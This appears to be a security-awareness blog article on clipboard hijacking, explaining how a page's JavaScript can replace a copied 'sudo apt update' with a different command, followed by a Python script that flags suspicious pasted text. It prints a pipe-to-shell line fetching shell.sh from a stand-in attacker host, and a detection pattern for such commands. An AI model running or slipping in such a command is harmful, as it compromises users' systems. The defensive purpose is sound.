Be careful when Copying Code from Web sites

Programmers, sysadmins, security researchers, technology lovers and I often copy and paste configuration and installation commands from websites that give quick instructions, instead of retyping each command. However, this habit is dangerous and can get the system hacked, because what you copy can be one command and what you paste another.

A security expert has performed a simple trick that will make you think twice before copying and pasting any commands from untrusted websites.


Clipboard vulnerability

Recently, Gabriel Friedlander, founder of the Wizer platform, which specializes in security awareness training, tested a simple but surprising hack that will make you cautious when copying commands from websites.

Copying frequently used commands from a website (ahem, StackOverflow) and pasting them into a command-line tool (terminal) such as CMD on Windows or Terminal on Linux is very familiar to novice programmers or lazy people like me.

But Friedlander warns that a web page can secretly replace the content of your clipboard, so that what is actually copied is vastly different from what you intended to copy.

Worse yet, without the necessary checks, programmers may only realize their mistake after pasting the text, by which time it may be too late.

You can try this hack at https://www.wizer-training.com/blog/copy-paste.

Try copying the line on the web page, then paste it in notepad or anywhere.

You will see that the result is not sudo apt update but:

curl http://attacker-domain:8000/shell.sh | sh

Many people think they are copying a seemingly harmless Linux system update command, but the clipboard actually holds a command that downloads shell.sh and executes it once the download is complete.

People pasting the text may be under the impression that they copied the familiar, harmless sudo apt update command, which fetches updates for the software installed on the system.

In fact, when you view the source of the website, you will see a JavaScript snippet that changes the content when you run the Copy command on that page.

To protect against this, you can use JavaScript-blocking extensions for Chrome such as ScriptBlock, Disable JavaScript or Toggle JavaScript, but with these enabled, some websites that rely on JavaScript will display incorrectly. The best approach when copying something is to paste it into Notepad first, check that it is correct, and only then paste it into the terminal.
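The "check before you paste" step above can also be done by a small script. The following is an added example, not code from the original article or from Wizer; the function name inspect_paste and its warning strings are hypothetical. It goes slightly beyond the article's case by also flagging embedded newlines (which make many terminals run a pasted command immediately) and invisible control characters.

```python
import re
import unicodedata

# Patterns that fetch remote content and hand it straight to an interpreter.
PIPE_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(sh|bash|zsh|python\d?)\b"
)


def inspect_paste(expected, pasted):
    """Return a list of warnings for text about to be pasted into a terminal.

    expected: what the user believes they selected on the page.
    pasted:   what the clipboard actually holds.
    """
    findings = []
    if pasted.strip() != expected.strip():
        findings.append("mismatch: clipboard differs from the selected text")
    if "\n" in pasted or "\r" in pasted:
        findings.append("newline: command would run as soon as it is pasted")
    if PIPE_TO_SHELL.search(pasted):
        findings.append("pipe-to-shell: downloads a script and executes it")
    # Control (Cc) and format (Cf) characters are invisible in most editors.
    hidden = [c for c in pasted
              if unicodedata.category(c) in ("Cc", "Cf") and c not in "\n\r\t"]
    if hidden:
        findings.append(f"hidden: {len(hidden)} control/format character(s)")
    return findings


if __name__ == "__main__":
    # Constructed sample: the visible text and the command from the article,
    # with a trailing newline added as an assumption.
    selected = "sudo apt update"
    clipboard = "curl http://attacker-domain:8000/shell.sh | sh\n"
    for warning in inspect_paste(selected, clipboard):
        print("WARNING:", warning)
```

An empty list means the clipboard matches the selected text and none of the checks fired; it does not mean the command itself is safe to run.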
